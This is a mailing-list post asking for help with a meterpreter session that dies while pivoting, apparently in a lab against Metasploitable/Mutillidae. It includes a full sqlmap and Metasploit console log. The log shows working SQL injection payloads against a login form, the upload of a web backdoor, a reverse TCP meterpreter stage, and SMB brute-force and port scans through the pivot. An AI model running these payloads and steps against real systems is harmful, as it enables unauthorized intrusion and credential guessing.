[sqlmap-users] Pivoting issues with sqlmap meterpreter session

[Soner T. <son...@ho...>]

Hi All,

I know that the meterpreter option in sqlmap is beta (as reported in parantheses during the payload selection). So is it expected that I am having problems with pivoting using the meterpreter session opened by sqlmap? Simple command execution on the meterpreter session seems to work fine though.

For example, I can successfully open a meterpreter session using Metasploitable/Mutillidae login page. Then, I background the session and add a route to the target network using a command like the following on the metasploit command prompt:

route add 10.0.0.0 255.255.255.0 1

which seems to be successful.

After that, I try to run smb_login scanner on a computer on the target network, such as 10.0.0.3. But when I listen to the traffic on 10.0.0.3, I can see only a few packets arriving to the machine. Otherwise, a similar smb_login run on metasploit without pivoting produces hundreds of packets, i.e. smb login attempts.

And if I try to run another scanner (such as the tcp port scanner) immediately afterwards, the meterpreter session dies.

Please see below the output I have captured of the example above (sorry for the escape sequences for coloring). Based on the SSL errors at the end, I believe that this issue may be related with SSL.

Does anybody see any mistake I am making (I am dealing with this issue for at least a week now)? Or is this a known issue (but I couldn't see a similar report on the issue tracker)? If not, and if somebody else can confirm too, I can submit a bug report as well.

As you can see below my software versions are:

sqlmap/1.0-dev, which is actually 0.9-3340 obtained from github
metasploit v4.7.2-1

I have tried with the original sqlmap and metasploit versions already installed on Kali 1.0 and Backtrack 5, and misc github versions of sqlmap too. They behave worse, and the latest versions I use can at least sustain the meterpreter session for a while before it dies. Any help would be appreciated.

TIA,


    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:12:27

[17:12:27] [INFO] testing connection to the target URL
[17:12:28] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:12:28] [INFO] searching for forms
 [#1] form:
POST http://192.168.2.149:80/mutillidae/index.php?page=login.php
POST data: username=&password=&login-php-submit-button=Login
do you want to test this form? [Y/n/q] 
> 
Edit POST data [default: username=&password=&login-php-submit-button=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] [17:12:35] [INFO] resuming back-end DBMS 'mysql' 
[17:12:35] [INFO] using '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv' as the CSV results file in multiple targets mode
[17:12:36] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-8398' OR (6065=6065)#&password=&login-php-submit-button=Login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=eUFX' AND (SELECT 8694 FROM(SELECT COUNT(*),CONCAT(0x7171656271,(SELECT (CASE WHEN (8694=8694) THEN 1 ELSE 0 END)),0x71706f6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BIzF'='BIzF&password=&login-php-submit-button=Login

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=eUFX' UNION ALL SELECT NULL,CONCAT(0x7171656271,0x6f4c455066514c626261,0x71706f6e71),NULL,NULL,NULL#&password=&login-php-submit-button=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=eUFX' AND 1483=BENCHMARK(5000000,MD5(0x63724c53)) AND 'pgsc'='pgsc&password=&login-php-submit-button=Login
---
 do you want to exploit this SQL injection? [Y/n] [17:12:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:12:37] [INFO] fingerprinting the back-end DBMS operating system
[17:12:37] [INFO] the back-end DBMS operating system is Linux
[17:12:37] [INFO] going to use a web backdoor to establish the tunnel
 which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> [17:12:38] [INFO] retrieved the web server document root: '/var/www'
[17:12:38] [INFO] retrieved web server full paths: '/var/www/mutillidae/index.php, /var/www/mutillidae/process'
[17:12:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[17:12:39] [WARNING] reflective value(s) found and filtering out
[17:12:39] [WARNING] unable to upload the file stager on '/var/www'
[17:12:39] [INFO] trying to upload the file stager on '/var/www' via UNION technique
[17:12:39] [WARNING] expect junk characters inside the file as a leftover from UNION query
[17:12:40] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[17:12:40] [INFO] trying to upload the file stager on '/var/www/mutillidae' via LIMIT INTO OUTFILE technique
[17:12:42] [INFO] heuristics detected web page charset 'ascii'
[17:12:42] [INFO] the file stager has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpuguhd.php
[17:12:42] [INFO] the backdoor has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpbbjkl.php
[17:12:42] [INFO] creating Metasploit Framework multi-stage shellcode 
 which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 
what is the local address? [192.168.2.221] 
which local port number do you want to use? [42294] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 
[17:12:50] [INFO] creation in progress .................. done
 what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> [17:13:10] [INFO] uploading shellcodeexec to '/tmp/tmpsejyxs'
[17:13:10] [INFO] shellcodeexec successfully uploaded
[17:13:10] [INFO] running Metasploit Framework command line interface locally, please wait..
[*] Initializing modules...
PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 42294
LHOST => 192.168.2.221
[*] Started reverse handler on 192.168.2.221:42294 
[*] Starting the payload handler...
[17:13:31] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.2.149
[*] Meterpreter session 1 opened (192.168.2.221:42294 -> 192.168.2.149:19485) at 2013-10-23 17:13:35 +0300

meterpreter > [*] Backgrounding session 1...
msf exploit(handler) > Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


       =[ metasploit v4.7.2-1 [core:4.7 api:1.0]
+ -- --=[ 1211 exploits - 733 auxiliary - 202 post
+ -- --=[ 317 payloads - 30 encoders - 8 nops

msf exploit(handler) > [*] postgresql connected to msf3
msf exploit(handler) > 
Active sessions
===============

  Id  Type                   Information                                                          Connection
  --  ----                   -----------                                                          ----------
  1   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ metasploitable  192.168.2.221:42294 -> 192.168.2.149:19485 (10.0.0.2)

msf exploit(handler) > [*] Route added
msf exploit(handler) > 
Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.0.0           255.255.255.0      Session 1

msf exploit(handler) > msf auxiliary(smb_login) > 
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > RHOSTS => 10.0.0.3
msf auxiliary(smb_login) > USER_FILE => /root/user
msf auxiliary(smb_login) > PASS_FILE => /root/pass
msf auxiliary(smb_login) > 
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE         /root/pass       no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS            10.0.0.3         yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /root/user       no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > 
[*] 10.0.0.3:445 SMB - Starting SMB login bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) > msf auxiliary(tcp) > 
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > RHOSTS => 10.0.0.3
msf auxiliary(tcp) > PORTS => 1-100
msf auxiliary(tcp) > THREADS => 10
msf auxiliary(tcp) > 
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-100            yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.3         yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > 
[-] 10.0.0.3:5 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:6 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:7 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:8 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:9 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:1 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:3 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:4 exception Errno::EPIPE Broken pipe ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[*] 10.0.0.2 - Meterpreter session 1 closed.  Reason: Died
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > 
[08:25:28] [INFO] cleaning up the web files uploaded
[08:25:28] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[08:25:28] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv'

[*] shutting down at 08:25:28